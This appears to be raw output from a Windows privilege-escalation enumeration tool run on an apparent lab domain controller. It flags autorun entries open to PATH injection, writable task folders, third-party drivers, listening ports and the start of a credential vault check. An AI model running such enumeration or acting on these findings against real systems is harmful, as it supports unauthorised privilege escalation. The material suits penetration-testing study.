File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvu9
Folder: None (PATH Injection)
File: tsbyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvyu
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: wavemapper
Folder: None (PATH Injection)
File: msacm32.drv
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: midimapper
Folder: None (PATH Injection)
File: midimap.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.imaadpcm
Folder: None (PATH Injection)
File: imaadp32.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.l3acm
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\l3codeca.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msadpcm
Folder: None (PATH Injection)
File: msadp32.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msg711
Folder: None (PATH Injection)
File: msg711.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msgsm610
Folder: None (PATH Injection)
File: msgsm32.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.cvid
Folder: None (PATH Injection)
File: iccvid.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.i420
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.iyuv
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.mrle
Folder: None (PATH Injection)
File: msrle32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.msvc
Folder: None (PATH Injection)
File: msvidc32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.uyvy
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yuy2
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvu9
Folder: None (PATH Injection)
File: tsbyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvyu
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: wavemapper
Folder: None (PATH Injection)
File: msacm32.drv
=================================================================================================
RegPath: HKLM\Software\Classes\htmlfile\shell\open\command
Folder: C:\Program Files\Internet Explorer
File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wow64cpu
Folder: None (PATH Injection)
File: wow64cpu.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wowarmhw
Folder: None (PATH Injection)
File: wowarmhw.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _xtajit
Folder: None (PATH Injection)
File: xtajit.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: advapi32
Folder: None (PATH Injection)
File: advapi32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: clbcatq
Folder: None (PATH Injection)
File: clbcatq.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: combase
Folder: None (PATH Injection)
File: combase.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: COMDLG32
Folder: None (PATH Injection)
File: COMDLG32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: coml2
Folder: None (PATH Injection)
File: coml2.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: DifxApi
Folder: None (PATH Injection)
File: difxapi.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdi32
Folder: None (PATH Injection)
File: gdi32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdiplus
Folder: None (PATH Injection)
File: gdiplus.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMAGEHLP
Folder: None (PATH Injection)
File: IMAGEHLP.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMM32
Folder: None (PATH Injection)
File: IMM32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: kernel32
Folder: None (PATH Injection)
File: kernel32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSCTF
Folder: None (PATH Injection)
File: MSCTF.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSVCRT
Folder: None (PATH Injection)
File: MSVCRT.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NORMALIZ
Folder: None (PATH Injection)
File: NORMALIZ.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NSI
Folder: None (PATH Injection)
File: NSI.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: ole32
Folder: None (PATH Injection)
File: ole32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: OLEAUT32
Folder: None (PATH Injection)
File: OLEAUT32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: PSAPI
Folder: None (PATH Injection)
File: PSAPI.DLL
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: rpcrt4
Folder: None (PATH Injection)
File: rpcrt4.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: sechost
Folder: None (PATH Injection)
File: sechost.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: Setupapi
Folder: None (PATH Injection)
File: Setupapi.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHCORE
Folder: None (PATH Injection)
File: SHCORE.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHELL32
Folder: None (PATH Injection)
File: SHELL32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHLWAPI
Folder: None (PATH Injection)
File: SHLWAPI.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: user32
Folder: None (PATH Injection)
File: user32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WLDAP32
Folder: None (PATH Injection)
File: WLDAP32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64
Folder: None (PATH Injection)
File: wow64.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64win
Folder: None (PATH Injection)
File: wow64win.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WS2_32
Folder: None (PATH Injection)
File: WS2_32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
Key: StubPath
Folder: \
FolderPerms: Users [AppendData/CreateDirectories]
File: /UserInstall
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
Key: StubPath
Folder: C:\Windows\system32
File: C:\Windows\system32\unregmp2.exe /FirstLogon
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
Key: StubPath
Folder: None (PATH Injection)
File: U
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\ie4uinit.exe -UserConfig
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenAdmin
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenUser
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
Key: StubPath
Folder: C:\Windows\system32
File: C:\Windows\system32\unregmp2.exe /FirstLogon
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\iesetup.dll,IEHardenAdmin
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\iesetup.dll,IEHardenUser
=================================================================================================
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected)
=================================================================================================
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows
File: C:\windows\system.ini
=================================================================================================
Folder: C:\windows
File: C:\windows\win.ini
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
ÉÍÍÍÍÍÍÍÍÍ͹ Device Drivers --Non Microsoft--
È Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#vulnerable-drivers
QLogic Gigabit Ethernet - 7.12.31.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxvbda.sys
QLogic 10 GigE - 7.13.65.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\evbda.sys
QLogic FastLinQ Ethernet - 8.33.20.103 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qevbda.sys
NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvraid.sys
VMware vSockets Service - 9.8.16.0 build-14168184 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys
VMware PCI VMCI Bus Device - 9.8.16.0 build-14168184 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys
Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys
Promiser SuperTrak EX Series - 5.1.0000.10 [Promise Technology, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys
LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\System32\drivers\3ware.sys
AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsata.sys
Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdxata.sys
AMD Technology AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsbs.sys
Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\arcsas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ItSas35i.sys
LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys
LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys
MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys
MEGASAS RAID Controller Driver for Windows - 6.714.05.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\MegaSas2i.sys
MEGASAS RAID Controller Driver for Windows - 7.705.08.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas35i.sys
MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasr.sys
Marvell Flash Controller - 1.0.5.1016 [Marvell Semiconductor, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys
NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvstor.sys
MEGASAS RAID Controller Driver for Windows - 6.805.03.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys
MEGASAS RAID Controller Driver for Windows - 6.604.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys
Microsoftr Windowsr Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys
Microsoftr Windowsr Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys
VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vsmraid.sys
VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys
Chelsio Communications iSCSI Controller - 10.0.10011.16384 [Chelsio Communications]: \\.\GLOBALROOT\SystemRoot\System32\drivers\cht4sx64.sys
Intel(R) Rapid Storage Technology driver (inbox) - 15.44.0.1010 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAVC.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadfcoei.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64 bit x64 [Emulex]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxfcoe.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.4.225.8009 11/15/2017 WS2K12 64 bit x64 [Broadcom]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxstor.sys
QLogic iSCSI offload driver - 8.33.5.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qeois.sys
QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql2300i.sys
QLA40XX iSCSI Host Bus Adapter - 2.1.5.0 (STOREx wx64) [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql40xx2i.sys
QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qlfcoei.sys
PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ADP80XX.SYS
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadi.sys
Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\HpSAMD.sys
SmartRAID, SmartHBA PQI Storport Driver - 1.50.0.0 [Microsemi Corportation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SmartSAMD.sys
QLogic FCoE offload driver - 8.33.4.2 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qefcoe.sys
QLogic iSCSI offload driver - 7.14.7.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxois.sys
QLogic FCoE Offload driver - 7.14.15.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxfcoe.sys
VMware Pointing PS/2 Device Driver - 12.5.10.0 build-14169150 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys
VMware SVGA 3D - 8.16.07.0008 - build-16233244 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp_loader.sys
VMware SVGA 3D - 8.16.07.0008 - build-16233244 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys
VMware PCIe Ethernet Adapter NDIS 6.30 (64-bit) - 1.8.16.0 build-14217867 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmxnet3.sys
VMware server memory controller - 7.5.5.0 build-14903665 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Network Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Network Shares
[X] Exception: Access denied
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerate Network Mapped Drives (WMI)
ÉÍÍÍÍÍÍÍÍÍ͹ Host File
ÉÍÍÍÍÍÍÍÍÍ͹ Network Ifaces and known hosts
È The masks are only for the IPv4 addresses
Ethernet0 2[00:50:56:B9:CA:BE]: 10.10.10.175, fe80::193:bd56:6cd:8df0%7, dead:beef::193:bd56:6cd:8df0, dead:beef::20 / 255.255.255.0
Gateways: 10.10.10.2, fe80::250:56ff:feb9:6ca8%7
DNSs: 8.8.8.8
Known hosts:
10.10.10.2 00-50-56-B9-6C-A8 Dynamic
10.10.10.255 FF-FF-FF-FF-FF-FF Static
169.254.255.255 00-00-00-00-00-00 Invalid
224.0.0.22 01-00-5E-00-00-16 Static
224.0.0.251 01-00-5E-00-00-FB Static
224.0.0.252 01-00-5E-00-00-FC Static
Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
Known hosts:
224.0.0.22 00-00-00-00-00-00 Static
ÉÍÍÍÍÍÍÍÍÍ͹ Current TCP Listening Ports
È Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 88 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 135 0.0.0.0 0 Listening 884 svchost
TCP 0.0.0.0 389 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 464 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 593 0.0.0.0 0 Listening 884 svchost
TCP 0.0.0.0 636 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 3268 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 3269 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 9389 0.0.0.0 0 Listening 2720 Microsoft.ActiveDirectory.WebServices
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0 Listening 484 wininit
TCP 0.0.0.0 49665 0.0.0.0 0 Listening 1132 svchost
TCP 0.0.0.0 49666 0.0.0.0 0 Listening 1368 svchost
TCP 0.0.0.0 49667 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 49673 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 49674 0.0.0.0 0 Listening 636 lsass
TCP 0.0.0.0 49675 0.0.0.0 0 Listening 2676 spoolsv
TCP 0.0.0.0 49680 0.0.0.0 0 Listening 620 services
TCP 0.0.0.0 49721 0.0.0.0 0 Listening 2808 dns
TCP 0.0.0.0 49743 0.0.0.0 0 Listening 2784 dfsrs
TCP 10.10.10.175 53 0.0.0.0 0 Listening 2808 dns
TCP 10.10.10.175 139 0.0.0.0 0 Listening 4 System
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP [::] 80 [::] 0 Listening 4 System
TCP [::] 88 [::] 0 Listening 636 lsass
TCP [::] 135 [::] 0 Listening 884 svchost
TCP [::] 389 [::] 0 Listening 636 lsass
TCP [::] 445 [::] 0 Listening 4 System
TCP [::] 464 [::] 0 Listening 636 lsass
TCP [::] 593 [::] 0 Listening 884 svchost
TCP [::] 636 [::] 0 Listening 636 lsass
TCP [::] 3268 [::] 0 Listening 636 lsass
TCP [::] 3269 [::] 0 Listening 636 lsass
TCP [::] 5985 [::] 0 Listening 4 System
TCP [::] 9389 [::] 0 Listening 2720 Microsoft.ActiveDirectory.WebServices
TCP [::] 47001 [::] 0 Listening 4 System
TCP [::] 49664 [::] 0 Listening 484 wininit
TCP [::] 49665 [::] 0 Listening 1132 svchost
TCP [::] 49666 [::] 0 Listening 1368 svchost
TCP [::] 49667 [::] 0 Listening 636 lsass
TCP [::] 49673 [::] 0 Listening 636 lsass
TCP [::] 49674 [::] 0 Listening 636 lsass
TCP [::] 49675 [::] 0 Listening 2676 spoolsv
TCP [::] 49680 [::] 0 Listening 620 services
TCP [::] 49721 [::] 0 Listening 2808 dns
TCP [::] 49743 [::] 0 Listening 2784 dfsrs
TCP [::1] 53 [::] 0 Listening 2808 dns
TCP [::1] 389 [::1] 49719 Established 636 lsass
TCP [::1] 49719 [::1] 389 Established 2808 dns
TCP [dead:beef::20] 53 [::] 0 Listening 2808 dns
TCP [dead:beef::193:bd56:6cd:8df0] 53 [::] 0 Listening 2808 dns
TCP [fe80::193:bd56:6cd:8df0%7] 53 [::] 0 Listening 2808 dns
TCP [fe80::193:bd56:6cd:8df0%7] 389 [fe80::193:bd56:6cd:8df0%7] 49720 Established 636 lsass
TCP [fe80::193:bd56:6cd:8df0%7] 389 [fe80::193:bd56:6cd:8df0%7] 49738 Established 636 lsass
TCP [fe80::193:bd56:6cd:8df0%7] 389 [fe80::193:bd56:6cd:8df0%7] 49741 Established 636 lsass
TCP [fe80::193:bd56:6cd:8df0%7] 49667 [fe80::193:bd56:6cd:8df0%7] 49740 Established 636 lsass
TCP [fe80::193:bd56:6cd:8df0%7] 49667 [fe80::193:bd56:6cd:8df0%7] 49773 Established 636 lsass
TCP [fe80::193:bd56:6cd:8df0%7] 49720 [fe80::193:bd56:6cd:8df0%7] 389 Established 2808 dns
TCP [fe80::193:bd56:6cd:8df0%7] 49738 [fe80::193:bd56:6cd:8df0%7] 389 Established 2784 dfsrs
TCP [fe80::193:bd56:6cd:8df0%7] 49740 [fe80::193:bd56:6cd:8df0%7] 49667 Established 2784 dfsrs
TCP [fe80::193:bd56:6cd:8df0%7] 49741 [fe80::193:bd56:6cd:8df0%7] 389 Established 2784 dfsrs
TCP [fe80::193:bd56:6cd:8df0%7] 49773 [fe80::193:bd56:6cd:8df0%7] 49667 Established 636 lsass
ÉÍÍÍÍÍÍÍÍÍ͹ Current UDP Listening Ports
È Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP 0.0.0.0 123 *:* 260 svchost
UDP 0.0.0.0 389 *:* 636 lsass
UDP 0.0.0.0 5353 *:* 764 svchost
UDP 0.0.0.0 5355 *:* 764 svchost
UDP 10.10.10.175 88 *:* 636 lsass
UDP 10.10.10.175 137 *:* 4 System
UDP 10.10.10.175 138 *:* 4 System
UDP 10.10.10.175 464 *:* 636 lsass
UDP 127.0.0.1 49544 *:* 1280 svchost
UDP 127.0.0.1 49664 *:* 1988 svchost
UDP 127.0.0.1 49669 *:* 2720 Microsoft.ActiveDirectory.WebServices
UDP 127.0.0.1 49670 *:* 2784 dfsrs
UDP 127.0.0.1 49672 *:* 1232 svchost
UDP 127.0.0.1 59169 *:* 3500 WmiPrvSE
UDP 127.0.0.1 60478 *:* 636 lsass
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP [::] 123 *:* 260 svchost
UDP [::] 389 *:* 636 lsass
UDP [::] 5353 *:* 764 svchost
UDP [::] 5355 *:* 764 svchost
UDP [dead:beef::20] 88 *:* 636 lsass
UDP [dead:beef::20] 464 *:* 636 lsass
UDP [dead:beef::193:bd56:6cd:8df0] 88 *:* 636 lsass
UDP [dead:beef::193:bd56:6cd:8df0] 464 *:* 636 lsass
UDP [fe80::193:bd56:6cd:8df0%7] 88 *:* 636 lsass
UDP [fe80::193:bd56:6cd:8df0%7] 464 *:* 636 lsass
ÉÍÍÍÍÍÍÍÍÍ͹ Firewall Rules
È Showing only DENY rules (too many ALLOW rules always)
Current Profiles: DOMAIN
FirewallEnabled (Domain): True
FirewallEnabled (Private): True
FirewallEnabled (Public): True
DENY rules:
ÉÍÍÍÍÍÍÍÍÍ͹ DNS cached --limit 70--
Entry Name Data
[X] Exception: Access denied
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Internet settings, zone and proxy configuration
General Settings
Hive Key Value
HKCU DisableCachingOfSSLPages 0
HKCU IE5_UA_Backup_Flag 5.0
HKCU PrivacyAdvanced 1
HKCU SecureProtocols 2688
HKCU User Agent Mozilla/4.0 (compatible; MSIE 8.0; Win32)
HKCU CertificateRevocation 1
HKCU ZonesSecurityUpgrade System.Byte[]
HKCU EnableNegotiate 1
HKCU ProxyEnable 0
HKLM ActiveXCache C:\Windows\Downloaded Program Files
HKLM CodeBaseSearchPath CODEBASE
HKLM EnablePunycode 1
HKLM MinorVersion 0
HKLM WarnOnIntranet 1
Zone Maps
No URLs configured
Zone Auth Settings
No Zone Auth Settings
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Windows Credentials ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Checking Windows Vault
